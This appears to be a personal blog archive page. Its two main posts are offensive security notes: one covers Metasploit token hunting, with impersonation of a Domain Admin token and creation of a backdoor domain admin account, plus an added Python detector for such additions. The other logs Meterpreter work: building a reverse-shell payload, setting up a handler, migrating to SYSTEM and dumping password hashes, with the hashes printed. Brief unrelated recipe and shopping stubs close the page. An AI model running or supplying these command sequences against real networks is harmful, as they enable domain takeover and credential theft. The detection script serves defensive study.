2010
08.20

Hunting For Domain Admin Tokens ~ Jabra

net group "Domain Admins" /domain

msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt

msf> sessions -i [session-with-domain-admin-token]

meterpreter> impersonate_token 'COMPANY\joe-admin'
meterpreter> execute -f cmd.exe -H -c -i -t

C:\>net user hack0r h4ck0r /add /domain
C:\>net group "Domain Admins" hack0r /add /domain

via: https://spl0it.wordpress.com/2009/12/15/hunting-for-domain-admin-tokens/
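The two net commands above create an account and drop it straight into Domain Admins; that create-then-escalate pair is exactly what domain controller auditing should catch. Added detection example (mine, not from the original post or from Jabra's write-up): it scans constructed, simplified Security-log lines in an assumed `<time> <EventID> key=value;...` layout, treating 4720 as account creation and 4728 as a member added to a security-enabled global group, and raises the severity when the new member was created shortly before the add.

```python
import re
from datetime import datetime, timedelta

# Constructed, simplified Security-log lines (not real captures). Layout assumed:
# "<ISO timestamp> <EventID> key=value;key=value;..."
# 4720 = user account created, 4728 = member added to a security-enabled global group.
SAMPLE_LOG = """\
2010-08-20T10:02:10 4720 subject=COMPANY\\joe-admin;target=COMPANY\\hack0r
2010-08-20T10:02:15 4728 subject=COMPANY\\joe-admin;member=COMPANY\\hack0r;group=Domain Admins
2010-08-20T11:30:00 4728 subject=COMPANY\\hr-admin;member=COMPANY\\newhire;group=Domain Users
2010-08-20T12:00:00 4720 subject=COMPANY\\hr-admin;target=COMPANY\\svc-backup
2010-08-21T12:00:00 4728 subject=COMPANY\\hr-admin;member=COMPANY\\svc-backup;group=Domain Admins
"""

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins"}
LINE_RE = re.compile(r"^(\S+) (\d+) (.*)$")


def parse_line(line):
    """Return (timestamp, event_id, fields) or None for an unparseable line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields = dict(kv.split("=", 1) for kv in m.group(3).split(";") if "=" in kv)
    return datetime.fromisoformat(m.group(1)), int(m.group(2)), fields


def detect_privileged_adds(log_text, window=timedelta(hours=1)):
    """Flag every add to a privileged group; mark it high severity when the
    member account was created within `window` before the add."""
    created_at = {}  # account -> creation time seen in a 4720 event
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, event_id, f = parsed
        if event_id == 4720:
            created_at[f["target"]] = ts
        elif event_id == 4728 and f.get("group") in PRIVILEGED_GROUPS:
            member = f["member"]
            recent = member in created_at and ts - created_at[member] <= window
            alerts.append({
                "time": ts.isoformat(), "member": member, "group": f["group"],
                "by": f["subject"], "severity": "high" if recent else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_privileged_adds(SAMPLE_LOG):
        print(alert)
```

Every add to a privileged group is reported; only the hack0r add, created five seconds earlier, comes out as high severity, while the svc-backup add a day after creation stays medium.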

2010
02.08

Self Meterpreter Notes:

Using the new hashdump from HD Moore, thanks to pauldotcom:
msfpayload windows/meterpreter/reverse_tcp LHOST=d.d.d.d LPORT=d X > test.exe

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST d.d.d.d
LHOST => d.d.d.d
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) >
[*] Starting the payload handler...
[*] Started reverse handler on port d

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (d.d.d.d:d -> d.d.d.d:49595)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: WINXPLAB01
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: WINXPLAB01\labuser
meterpreter > shell
Process 1088 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\labuser\Desktop>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
labuser
The command completed successfully.
C:\Documents and Settings\labuser\Desktop>exit

meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5b4834a4e5c2c97eab07a2c865fbcc3e:10362ac86d8a65482cc0010265605578:::
labuser:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:067c11d22e8bc3e9b51d0f4eb2a5952a:::
meterpreter >

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 5
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
meterpreter >

/*migrate to a SYSTEM pid*/
meterpreter > migrate 1040
[*] Migrating to 1040...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

2009
11.23

Apple Pie from Southern Living Sept 2008

Click here for the Apple Pie recipe!

2009
11.20

Black Friday Deals at Amazon…